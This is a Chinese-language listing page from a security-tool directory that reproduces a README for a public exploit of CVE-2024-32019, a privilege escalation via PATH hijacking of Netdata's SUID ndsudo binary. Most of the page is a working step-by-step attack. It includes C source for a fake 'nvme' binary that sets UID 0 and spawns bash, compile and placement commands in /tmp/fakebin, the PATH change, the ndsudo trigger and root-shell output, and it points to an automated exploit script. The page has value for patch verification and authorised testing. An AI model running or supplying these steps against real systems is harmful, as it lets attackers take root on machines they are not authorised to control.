Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation — CVE-2024-32019 是 Netdata(版本 >= 1.44.0-60 且 < 1.45.3)中的一个高严重性本地权限提升漏洞,由 ndsudo SUID 二进制文件中对 PATH 变量的不安全使用所致,攻击者可借此以 root 身份执行任意命令。 | Kitploit
工具/GitHubGitHub/dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation
权限提升漏洞分析漏洞利用渗透测试学习与教育Payload 开发二进制利用实验室与实践
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation

CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation

CVE-2024-32019 是 Netdata(版本 >= 1.44.0-60 且 < 1.45.3)中的一个高严重性本地权限提升漏洞,由 ndsudo SUID 二进制文件中对 PATH 变量的不安全使用所致,攻击者可借此以 root 身份执行任意命令。

查看仓库网站
14121年前尚未审核

🚨 CVE-2024-32019 - Netdata ndsudo PATH 漏洞利用 (LPE 提权至 Root)

一个基于 Python 的漏洞利用工具,针对 CVE-2024-32019(Netdata Agent 中的一个高危本地权限提升漏洞),利用了一个配置错误的 SUID 二进制文件(ndsudo),该文件未能安全处理 PATH 环境变量。


[!Caution] 此代码仅用于教育和授权测试目的。未经授权在您不拥有或未经明确许可的系统上使用此工具是非法的。

🔍 概述

CVE ID: CVE-2024-32019
CVSS 评分: 8.8 (高危)
披露日期: 2024年4月12日
组件: Netdata Agent
受影响版本:

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🧠 技术摘要

Netdata 的 ndsudo 工具是一个 SUID root 二进制文件,旨在代表非 root 用户安全地执行一组有限的系统命令(如 nvme)。

然而,由于实现缺陷,它在解析命令二进制文件时会尊重用户控制的 PATH 变量。如果攻击者能够操纵 PATH 使其包含一个包含恶意二进制文件的可写目录,ndsudo 将以 root 权限执行该文件——从而导致本地权限提升。


💥 手动利用步骤

以下步骤演示了如何手动利用 ndsudo 中的漏洞。

1. 创建一个权限提升二进制文件

将以下 C 代码保存为 nvme.c:

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

2. 编译漏洞利用程序

root@kitploit:~
gcc nvme.c -o nvme

3. 在目标上准备漏洞利用环境

root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme

4. 修改 PATH

root@kitploit:~
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme

5. 触发漏洞利用

root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

如果成功,您将获得一个 root shell。

root@kitploit:~
# whoami
root

自动利用

如果您具有 SSH 访问权限,可以使用 CVE-2024-32019-dbs.py 来自动化此过程。

Exploitation using script

📎 参考资料

  • GitHub 安全通告
  • CVSS 评分: 8.8 (高危)
  • CVE-2024-32019: Netdata 漏洞分析与缓解措施
下载工具